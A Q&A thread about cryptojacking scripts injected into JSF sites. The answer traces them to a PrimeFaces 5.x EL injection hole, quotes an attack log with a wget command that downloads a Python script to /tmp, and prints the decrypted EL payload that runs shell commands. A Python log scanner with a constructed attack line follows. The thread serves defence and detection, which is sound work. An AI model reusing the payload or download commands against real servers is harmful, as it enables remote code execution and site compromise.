JSF Cryptojacking Malware

Now, I know that this is not a website for malware removal. However, I believe this is a specific JSF question.

I noticed that my site is constantly being attacked by the injection of a JavaScript file into a web page.

The malware loads the script file from a random URL with the following pattern: https://johndi33.*****.***:7777/deepMiner.js.

When I redeploy the application the malware is removed, but after a few hours the attack resumes and the script is injected again.

While researching this specific malware I found hundreds or thousands of infected sites carrying the same malware, and I also noticed that all the infected websites are JSF-based.

I wonder whether there is any information about this, or any JSF misconfiguration that could easily lead to RCE.

PS - Environment:

  • Ubuntu 16.04

  • Wildfly 10.1

  • Java 8

1 answer

JSF (Mojarra) has no known remote code execution vulnerabilities. See also the CVE summary, which lists only XSS bugs in prehistoric versions prior to 1.2_08.

Only PrimeFaces 5.x had an EL injection hole, in its StreamedContent resource handler behind /dynamiccontent.properties. This EL injection hole allowed an attacker to execute code on the server machine. See also the CVE summary for this particular vulnerability. Your environment confirms that you are using PrimeFaces.

It was reported in 2016 as PrimeFaces issue 1152 and fixed in PrimeFaces 5.2.21/5.3.8/6.0, but apparently it was not advertised enough and/or developers are too lazy to upgrade.

Here is a sample from an attack log, as seen on one of my own servers. Note the pfdrid and cmd request parameters in the /dynamiccontent.properties request:

"GET /javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7rn%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV%2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO%2Flsw3k%2FbYSofV9MA%2BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM%2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA%2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT%2F19mudycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5%2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7%2BN%2FWheWQCn%2FEM0xlpXC4GssZp4xPVah%2BP9wNH054upTkx4jH8j4houh2UfrjM9Vn18J%2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVMJ%2FhWkW7XwVkNS2b0%2B%2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP%2FLQjU6%2F%2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ%2FKkJNyWwN3wlsEfNFJzLx8%2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvlgWi2yEzFt9NA0NFhhZ4m6UeRZ7%2Bgs1Rr0HMpPu%2FNIvaCjTyZRdqRyxrDQ%2FF2QCTxpVEWKYWEEV2t6g%2BQ2m3Xo%2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV%2FymlnhNoSnVQoDJeumsGI1%2BdmKu2AJY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d%2FfxIRUZ1tKeLPST16CBlY0%2BPsRQDJJwWrRXdpuwon4PzHQXLD%2BAhQ%2F8j9Mb0OTM8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1%2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK%2BkoPySJCmpHOmrrsbNlp0kHtNHuhY&cmd=wget%20http://XXX.XXX.XXX.XXX/CONTACT/test.py%20-O%20/tmp/test.py%20--no-check-certificate HTTP/1.1" 200 1 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0"

The pfdrid parameter holds the encrypted EL expression that refers to the bean property returning the StreamedContent, e.g. #{bean.image}. The problem was that the encryption used a fixed (8-byte) key, so an attacker could easily construct their own encrypted EL expression.

In the sample above, the pfdrid parameter as decrypted by the PrimeFaces 5.x StreamedContentHandler contains the following EL expression (formatting is mine):

${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent()
    .newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs()))
    .loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("
    var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start();
    var is = proc.getInputStream();
    var sc = new java.util.Scanner(is,\"UTF-8\");
    var out = \"\";
    while (sc.hasNext()) {
        out += sc.nextLine()+String.fromCharCode(10);
    }
    print(out);
"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}
${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}

This basically starts a JavaScript engine, which spawns a /bin/sh process running whatever command was passed in the cmd request parameter, here wget%20http://XXX.XXX.XXX.XXX/CONTACT/test.py%20-O%20/tmp/test.py%20--no-check-certificate, which downloads a Python script into the server's /tmp folder. After checking for the stillok=yes response header, the attacker's next request, probably through the same /dynamiccontent.properties hole, executes that Python script, which then presumably locates the web pages and injects the cryptomining script.

Upgrade PrimeFaces.

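As an added example (not part of the question or of the answer above), here is a small Python access-log check that flags the request shape the answer describes: requests for the dynamiccontent.properties resource aimed at the StreamedContent handler (pfdrt=sc) that carry query parameters PrimeFaces itself never adds, such as cmd, or an implausibly long pfdrid value. The three log lines are constructed for the example; the allow-list of expected parameters, the pfdrid length threshold and the path regex are my assumptions and should be checked against your own PrimeFaces version and servlet mapping.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in combined-log format (not real traffic).
# Line 1: a legitimate PrimeFaces StreamedContent request.
# Line 2: a request shaped like the attack log quoted in the answer.
# Line 3: an unrelated page request.
_ATTACK_PFDRID = "Q" * 700  # stands in for the attacker's long, self-built ciphertext
SAMPLE_LOG = (
    '10.0.0.5 - - [28/Apr/2018:10:12:01 +0000] "GET /app/javax.faces.resource/dynamiccontent.properties.xhtml'
    '?pfdrt=sc&ln=primefaces&pfdrid=k4gX9 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"\n'
    '203.0.113.7 - - [28/Apr/2018:10:12:05 +0000] "GET /app/javax.faces.resource/dynamiccontent.properties.xhtml'
    f'?pfdrt=sc&ln=primefaces&pfdrid={_ATTACK_PFDRID}'
    '&cmd=wget%20http://203.0.113.7/x.py%20-O%20/tmp/x.py%20--no-check-certificate HTTP/1.1" 200 1 "-" "Mozilla/5.0"\n'
    '10.0.0.6 - - [28/Apr/2018:10:12:09 +0000] "GET /app/index.xhtml HTTP/1.1" 200 2048 "-" "Mozilla/5.0"\n'
)

# Combined-log line: client, ident, user, [timestamp], "METHOD target protocol", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The resource under suffix mapping (.xhtml/.jsf) or prefix mapping (/faces/...); assumption.
DYNCONTENT_RE = re.compile(r'/javax\.faces\.resource/dynamiccontent\.properties(\.[A-Za-z]+)?$')

# Query parameters PrimeFaces itself places on a StreamedContent URL. This allow-list
# is an assumption for the example; verify it against your own PrimeFaces version.
EXPECTED_PARAMS = {"ln", "pfdrt", "pfdrid", "uid", "v", "pfdrv"}
# A genuine encrypted "#{bean.image}" is short; the attacker-built EL payload in the
# answer runs to thousands of characters. The threshold is an assumption.
MAX_SANE_PFDRID_LEN = 512


def analyze(log_text):
    """Return one finding dict per suspicious dynamiccontent.properties request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not DYNCONTENT_RE.search(url.path):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("pfdrt") != ["sc"]:  # only the StreamedContent handler was affected
            continue
        reasons = []
        unexpected = sorted(set(params) - EXPECTED_PARAMS)
        if unexpected:
            reasons.append("unexpected parameters: " + ", ".join(unexpected))
        pfdrid_len = len(params.get("pfdrid", [""])[0])
        if pfdrid_len > MAX_SANE_PFDRID_LEN:
            reasons.append(f"pfdrid is {pfdrid_len} chars long")
        if not reasons:
            continue
        findings.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            "unexpected": unexpected,
            "pfdrid_len": pfdrid_len,
            # parse_qs has already percent-decoded the value, so this is the shell command as run
            "cmd": params["cmd"][0] if "cmd" in params else None,
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']}: " + "; ".join(f["reasons"]))
        if f["cmd"]:
            print("  cmd =", f["cmd"])
```

Point it at the WildFly/Undertow access log or the front proxy's log. A hit tells you the hole is being probed or has already been used, so treat the host as compromised and look in /tmp for dropped files; an empty result does not prove the opposite, since the payload can be carried in pfdrid alone without a separate cmd parameter. The fix remains the one the answer gives: upgrade PrimeFaces.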

Source: https://habr.com/ru/post/1692342/
